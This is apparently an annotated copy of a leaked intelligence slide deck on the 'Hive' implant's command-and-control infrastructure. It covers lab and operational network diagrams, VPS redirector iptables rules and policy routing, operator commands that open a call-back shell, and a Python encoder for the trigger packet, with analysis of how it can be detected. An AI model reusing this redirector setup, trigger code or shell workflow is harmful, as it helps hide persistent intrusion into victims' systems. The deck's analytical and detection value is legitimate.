Hive Operating Environment

SECRET//NOFORN

Hive Beacon Infrastructure

[Figure: overview of the beacon path. Components shown: several Implanted Hosts; a VPS Server running Apache with mod_proxy and IPTABLES forwarding; Proxy / VPN Servers (OSN VPN network connections, Linux-based infrastructure); a Cover Server; Blot 4.0; a DNS Server; and Honeycomb, whose Log Files go by One-way Transfer to the RIPPER / SNAPPER database. The implant-to-infrastructure leg is labelled SSL Session.]

Hive Beacon Test Infrastructure: VPS Servers, IPTABLES Forwarding

[Figure: numbered hops 1-6. Two Implanted Hosts beacon to two VPS servers, cover domain vhost1.edb.devlan.net (eth0 10.6.5.191, eth1 172.16.63.1, taps tap010/tap011) and cover domain vhost2.edb.devlan.net (eth0 10.6.5.192, eth1 172.16.63.2, taps tap020/tap021). VPN tunnels carry the forwarded traffic to Blot (eth1 172.16.63.101, tunnel endpoint 10.177.77.1, 172.16.64.1 on the cover-side network). On that network sit Beastbox (10.6.5.196, eth1 172.16.64.10, taps tap030-tap032) and the Cover Server (10.6.5.197, taps tap040/tap041). Honeycomb (10.2.4.119) is the Tool Handler / Command Post. Hosts hang off tap interfaces on bridges br0, br1 and br2; 10.6.5.190 is also shown on an eth1.]

VPS Proxy Port Redirection Map (inbound port on the VPS -> port it is redirected to):

    80   -> 8001
    443  -> 44301

Cover Server Address Mapping:

    172.16.64.11: vhost1
    172.16.64.12: vhost2
    ...

Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding

[Figure: the same lab with the interfaces renamed. Implanted Host 1 beacons to target domain vhost1.edb.devlan.net on the VPS at eth0 10.6.5.191 / eth1 172.16.63.1 (tap1, tap11); Implanted Host 2 beacons to target domain vhost2.edb.devlan.net on the VPS at eth0 10.6.5.192 / eth1 172.16.63.2 (tap2, tap21). VPN tunnels lead to Blot (172.16.63.101, tunnel 10.177.77.1, 172.16.64.1; taps tap31, tap32 on bridges br1, br2). Beastbox is 10.6.5.196 (tap3, eth1 172.16.64.10), the Cover Server 10.6.5.197 (tap4, tap41), and Honeycomb 10.2.4.119 is the Tool Handler. Hops are numbered 1-5.]

Cover Server Ports:

    172.16.64.11: vhost1
    172.16.64.12: vhost2
    ...

Blot In-bound Ports (one HTTP and one HTTPS port per cover vhost):

    8001:  vhost1
    44301: vhost1
    8002:  vhost2
    44302: vhost2
    ...


TOP SECRET//SI//NOFORN

Hive Beacon Operational Infrastructure: VPS Servers

[Figure: the production counterpart of the lab. Two Implanted Hosts beacon to the target domains playa-del-rio.com and viva-rio-engracado.com, each served by a CentOS-5.6 32-bit VPS doing IPTABLES forwarding. VPN tunnels carry the traffic to Blot (CentOS-5.8 64-bit, tunnel endpoint 10.177.77.1), with Beastbox and the Cover Server behind it, and to Honeycomb, the Tool Handler (CentOS-5.8 64-bit). Public addresses shown: 78.47.85.121/28 and 78.47.85.114/28; 78.47.131.68/29 (gateway 78.47.131.65); 88.198.156.226/29 (gateway 88.198.156.225); 91.93.104.178/25. Internal addresses shown: 172.24.5.141/23, 172.24.5.132/23, 172.24.5.188/23.]


SinnerTwin Deployment Environment

Hive Operation

[Figure: sequence diagram. On the Implanted Host, hived waits on its listening port (TriggerListen). A Trigger from the operator causes fork_process; the diagram marks the parent and child as P and C, and the child runs start_triggered_connect and TriggerCallbackSession, opening an SSL Session back to the GENESIS ICON Workstation. There hclient / cutthroat runs StartClientSession and launchShell. The operator's side of the exchange, as shown:]

    $ ./cutthroat ./hive
    > ilm connect
    > shell open

[The call-back shell is open and the operator has a shell on the implanted host.]

Raw TCP/UDP Trigger

Hive 2.5 Algorithm (400 bytes, fixed length). Fields in slide order:

    offset 0    8 bytes random data
    offset 8    92 bytes "CRC random data" (the field the CRC is computed over)
                CRC
                random data of length CRC % 200
                12-byte integer pad (N x 127)
                25-byte pad
                1-byte XOR value
                encoded 12-byte trigger
                random data (fill to 400 bytes)

The twelve-byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger; the remaining seven trigger bytes are XORed with the constant 0xB6. Because that constant is the same in every packet, the last seven encoded bytes stand in a fixed relationship to the trigger payload that does not depend on the per-packet XOR value.

Hive 2.6 Algorithm (126 bytes minimum, 472 bytes maximum). Fields in slide order:

    offset 0    8 bytes random data
    offset 8    92 bytes "CRC random data"
                CRC
                random data of length CRC % 200
                8-byte integer (N x 127), PAD1
                encoded 12-byte trigger, PAD2
                random data of length CRC % 146

The twelve-byte trigger is encoded by computing an offset of CRC % 72 into the 92-byte CRC random data field and XORing each of the twelve bytes found there with the corresponding byte of the twelve-byte trigger payload. The key material therefore changes with every packet, and since the offset is at most 71 the twelve key bytes always lie inside the 92-byte field (71 + 12 = 83 <= 92). This removes the constant-0xB6 relationship of the 2.5 encoding.
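The two trigger encodings described above, written out as an added example. This is not Hive's code and nothing below comes from the slide deck beyond the XOR rules it states: the first five bytes XORed with the 1-byte value and the remaining seven with 0xB6 for 2.5, and the twelve bytes at offset CRC % 72 of the 92-byte CRC random data field for 2.6. Everything else is an assumption made for the example: the CRC function (the slide names none, so zlib's CRC-32 stands in), and the sample trigger and field contents, which are constructed. The packet's other fields are not built. The last function makes the detection point concrete by counting how many encoded bytes of a 2.5 trigger are identical under every possible XOR value.

```python
"""Encoding of the twelve-byte Hive trigger for the 2.5 and 2.6 schemes.

Added example, not Hive's own code. Only the XOR steps follow the slide;
the CRC variant and the sample data are assumptions for this example.
"""
import zlib

TRIGGER_LEN = 12
CRC_FIELD_LEN = 92      # "92 CRC Random Data" on the slide
XOR25_SPLIT = 5         # 2.5: first five bytes use the per-packet XOR byte
XOR25_CONST = 0xB6      # 2.5: remaining seven bytes use this constant
OFFSET26_MOD = 72       # 2.6: offset = CRC % 72 into the CRC random data


def crc_of(data: bytes) -> int:
    """Stand-in CRC. The slide does not name the CRC Hive uses, so
    CRC-32 from zlib is an assumption made for this example."""
    return zlib.crc32(data) & 0xFFFFFFFF


def _check_trigger(trigger: bytes) -> None:
    if len(trigger) != TRIGGER_LEN:
        raise ValueError("trigger payload must be exactly 12 bytes")


def encode_trigger_25(trigger: bytes, xor_byte: int) -> bytes:
    """Hive 2.5: bytes 0-4 XOR xor_byte, bytes 5-11 XOR 0xB6."""
    _check_trigger(trigger)
    if not 0 <= xor_byte <= 0xFF:
        raise ValueError("xor_byte must fit in one byte")
    head = bytes(b ^ xor_byte for b in trigger[:XOR25_SPLIT])
    tail = bytes(b ^ XOR25_CONST for b in trigger[XOR25_SPLIT:])
    return head + tail


# XOR is its own inverse, so decoding is the same operation.
decode_trigger_25 = encode_trigger_25


def keystream_26(crc_field: bytes, crc: int) -> bytes:
    """Hive 2.6: the 12 bytes at offset (CRC % 72) inside the 92-byte
    CRC random data field. 71 + 12 = 83 <= 92, so the slice never runs
    off the end of the field."""
    if len(crc_field) != CRC_FIELD_LEN:
        raise ValueError("CRC random data field must be 92 bytes")
    off = crc % OFFSET26_MOD
    return crc_field[off:off + TRIGGER_LEN]


def encode_trigger_26(trigger: bytes, crc_field: bytes, crc: int) -> bytes:
    """Hive 2.6: trigger XOR the 12 bytes selected by keystream_26."""
    _check_trigger(trigger)
    ks = keystream_26(crc_field, crc)
    return bytes(t ^ k for t, k in zip(trigger, ks))


decode_trigger_26 = encode_trigger_26


def key_independent_bytes_25(trigger: bytes) -> int:
    """Number of encoded byte positions that come out identical for every
    possible xor_byte. For 2.5 these are the seven 0xB6-keyed bytes: a
    fixed relationship to the trigger that a sensor can pattern-match,
    and which 2.6 removes by keying from per-packet random data."""
    encodings = [encode_trigger_25(trigger, k) for k in range(256)]
    return sum(
        1 for i in range(TRIGGER_LEN)
        if len({e[i] for e in encodings}) == 1
    )


if __name__ == "__main__":
    # Constructed sample data, not captured traffic.
    trigger = bytes(range(12))
    field = bytes((i * 37 + 11) & 0xFF for i in range(CRC_FIELD_LEN))
    crc = crc_of(field)
    enc25 = encode_trigger_25(trigger, 0x5A)
    enc26 = encode_trigger_26(trigger, field, crc)
    print("2.5 encoded:", enc25.hex(), "key-independent bytes:",
          key_independent_bytes_25(trigger))
    print("2.6 encoded:", enc26.hex(), "offset:", crc % OFFSET26_MOD)
    assert decode_trigger_25(enc25, 0x5A) == trigger
    assert decode_trigger_26(enc26, field, crc) == trigger
```

Run stand-alone, the script round-trips a constructed trigger through both schemes and reports that seven of the twelve 2.5 bytes never change with the XOR value, while the 2.6 keystream comes from the packet's own random field; the real packet layout around the trigger is as listed in the slide and is not reproduced here.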

Scrap slides follow


SECRET//SI//NOFORN

Hive Beacon Lab Test Infrastructure

[Figure: Implanted Hosts (PowerPC at eth0 10.2.5.5, MAC 00:0C:42:99:8A:E1; MIPSBE at eth0 10.2.5.6, MAC 00:0C:42:4D:7B:DE; x86 at eth0 10.6.5.190, MAC 52:54:00:9A:B0:72; sparc at eri0 10.2.5.5, MAC 00:03:BA:86:6A:78), all on VLAN 65. VPS Servers: target domain domainA.com (CentOS-5.9 32-bit; eth0 10.6.5.191/24, eth1 172.16.63.1/24, tun0 10.177.77.10) and target domain domainB.com (eth0 10.6.5.192/24, eth1 172.16.63.2/24). Proxy / Director, Blot (CentOS-6.3 64-bit; eth1 172.16.63.101, tun0 10.177.77.1, eth2 172.16.64.1) terminates the VPN tunnels. Response Servers: Beastbox (eth0 10.6.5.196, eth1 172.16.64.10), Cover Server (eth0 10.6.5.197, eth1 172.16.64.100) and Honeycomb, the Tool Handler (eth0 10.6.5.198, CentOS-6.2 64-bit); Command Post at eth0 10.6.5.195/24 (CentOS-6.2 64-bit). Bridges hive1 and hive2.]

Hive Test Infrastructure

[Figure: same lab as the previous slide with Blot and Beastbox drawn as one box. Implanted Hosts: PowerPC eth0 10.2.5.5 (00:0C:42:99:8A:E1), MIPSBE eth0 10.2.5.6 (00:0C:42:4D:7B:DE), x86 eth0 10.6.5.190 (52:54:00:9A:B0:72) and eth0 10.6.5.193 (52:54:00:95:DA:16), sparc eri0 10.2.5.5 (00:03:BA:86:6A:78), on VLAN 65. VPS Servers: domainA.com (eth0 10.6.5.191/24, eth1 172.16.63.1/24, tun0 10.177.77.a) and domainB.com (eth0 10.6.5.192/24, eth1 172.16.63.2/24, tun0 10.177.77.b); CentOS-5.9 32-bit. Proxy / Director (CentOS-6.3 64-bit) with eth1 172.16.63.101, alias eth1:1 172.16.63.102, tun0 10.177.77.1 for the VPN tunnels, and eth2 172.16.64.1 toward the Response Servers. Blot / Beastbox eth0 10.6.5.196, eth1 172.16.64.10 with aliases eth1:1 .11 and eth1:2 .12; Cover Server eth0 10.6.5.197, eth1 172.16.64.100; Honeycomb Tool Handler eth0 10.6.5.198 (CentOS-6.2 64-bit); Command Post eth0 10.6.5.195/24 (CentOS-6.2 64-bit). Bridges hive1 and hive2.]

New Hive Test Infrastructure

[Figure: the revised lab. Implanted Hosts: PowerPC eth0 10.2.5.5 (00:0C:42:99:8A:E1), MIPSBE eth0 10.2.5.6 (00:0C:42:4D:7B:DE), sparc eri0 10.2.5.5 (00:03:BA:86:6A:78), x86 eth0 10.6.5.193 (52:54:00:95:DA:16), plus implant1 at eth0 10.6.5.190 (52:54:00:9A:B0:72, SSL to domainA.com) and implant2 at eth0 10.6.5.189 (target domain domainB.com), on VLAN 65. VPS Servers: eth0 10.6.5.191/24 with eth1 172.16.63.1/24 and eth0 10.6.5.192/24 with eth1 172.16.63.2/24. Proxy / Director (CentOS-6.3 64-bit) carries one implant-facing alias per domain, eth1 172.16.63.111 (implant1) and eth1:1 172.16.63.112 (implant2), and eth1 172.16.64.10 with aliases .11 and .12. Response Servers: an Nginx Proxy (CentOS-6.4 64-bit, eth2 172.16.64.2) in front of the Cover Server (eth0 10.6.5.197; eth1 172.16.64.100 for domainA.com, eth1:1 .101 for domainB.com, eth1:2 .102); Honeycomb Tool Handler eth0 10.6.5.198 (CentOS-6.2 64-bit); Command Post eth0 10.6.5.195/24 (CentOS-6.2 64-bit). Bridges hive1 and hive2.]

Policy routing script shown on the slide (quoting corrected so the two table names land on separate lines of rt_tables):

    #!/bin/bash
    # Script to configure policy routing: traffic sourced from each
    # implant-facing alias (172.16.63.111 for domainA, 172.16.63.112 for
    # domainB) is routed by its own table rather than the main table.
    # One "<id><tab><name>" entry per line; -e expands the tab and keeps
    # the trailing newline that -n would suppress.
    echo -e "101\thiveA" >> /etc/iproute2/rt_tables
    echo -e "102\thiveB" >> /etc/iproute2/rt_tables
    # Default route for each table (both via 172.16.63.2 on the slide).
    ip route add default via 172.16.63.2 table hiveA
    ip route add default via 172.16.63.2 table hiveB
    # Source-address rules select the table; prio 1 puts them ahead of
    # the main-table lookup.
    ip rule add from 172.16.63.111 table hiveA prio 1
    ip rule add from 172.16.63.112 table hiveB prio 1

Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding

[Figure: Implanted Host 10.3.2.185 beacons to target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net on the VPS Server (eth0 10.3.2.174, p3p2 172.16.63.1). The VPS forwards to the Blot Proxy (172.16.63.101, 172.16.64.1), which runs the VPN Server and an Apache Server, with the Cover Server (10.3.2.113), 10.3.2.125, 172.16.63.131 and Honeycomb (10.2.4.119, Tool Handler) behind it.]

VPS Server IPTABLES Configuration (the same rule set is printed on the next slide as well):

    # Forwarding on the VPS needs net.ipv4.ip_forward=1; this sysctl is
    # not on the slide and is assumed here.
    sysctl -w net.ipv4.ip_forward=1

    # Default-deny on every chain (upper-case -P sets a chain policy;
    # lower-case -p selects a protocol).
    iptables -P INPUT DROP
    iptables -P FORWARD DROP
    iptables -P OUTPUT DROP
    # Only administrative SSH reaches the VPS itself, and nothing else may
    # originate from it; forwarded traffic is unaffected because it goes
    # through FORWARD, not INPUT/OUTPUT.
    iptables -A INPUT -p tcp --dport 22 -j ACCEPT
    iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

    # DNAT: a beacon to the cover address on tcp/53, tcp/80 or tcp/443 is
    # rewritten to the Blot proxy's port 443.
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53  -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80  -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443

    # FORWARDING
    iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
    # FORWARD sees a packet after PREROUTING DNAT, so its destination port
    # is already 443: the --dport 53 and --dport 80 rules below never match,
    # and the --dport 443 rule admits all three redirected flows.
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53  -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80  -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT

    # SNAT: forwarded traffic leaves p3p2 with the VPS's own address, so Blot
    # sees the VPS, not the implant, as the source.
    iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE

Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding

[Figure: the 10.6.5.x lab drawn with tap interfaces. Implanted Host 1 beacons to target domain vhost1.edb.devlan.net on the VPS at eth0 10.6.5.191 / eth1 172.16.63.1 (tap1, tap11, bridge br1); Implanted Host 2 beacons to target domain vhost2.edb.devlan.net on the VPS at eth0 10.6.5.192 / eth1 172.16.63.2 (tap2, tap21, bridge br2). The Blot Proxy (172.16.63.101, 172.16.64.1; tap31, tap32) runs the VPN Server and an Apache Server; behind it 172.16.64.10 (tap41), the Cover Server at 10.6.5.197 (tap4), 10.6.5.196 (tap3) and Honeycomb at 10.2.4.119, the Tool Handler. The slide repeats the VPS Server IPTABLES Configuration of the previous slide verbatim, still with the 10.3.2.174 cover address and the p3p2 interface name.]

Hive Beacon Test Infrastructure: VPS Server, IPTABLES Forwarding

[Figure: the same tap-interface lab with the port maps. Implanted Host 1 to target domain vhost1.edb.devlan.net on the VPS at eth0 10.6.5.191 / 172.16.63.1 (tap1, tap11, bridge br1); Implanted Host 2 to target domain vhost2.edb.devlan.net on the VPS at eth0 10.6.5.192 / 172.16.63.2 (tap2, tap21, bridge br2). Blot Proxy with VPN Server and Apache Server at 172.16.63.101 / 172.16.64.1 (tap31, tap32); 172.16.64.10 (tap41); Cover Server 10.6.5.197 (tap4); 10.6.5.196 (tap3); Honeycomb 10.2.4.119, Tool Handler.]

Cover Server Ports:

    172.16.64.11: vhost1
    172.16.64.12: vhost2
    ...

Blot In-bound Ports:

    8001:  vhost1
    44301: vhost1
    8002:  vhost2
    44302: vhost2
    ...
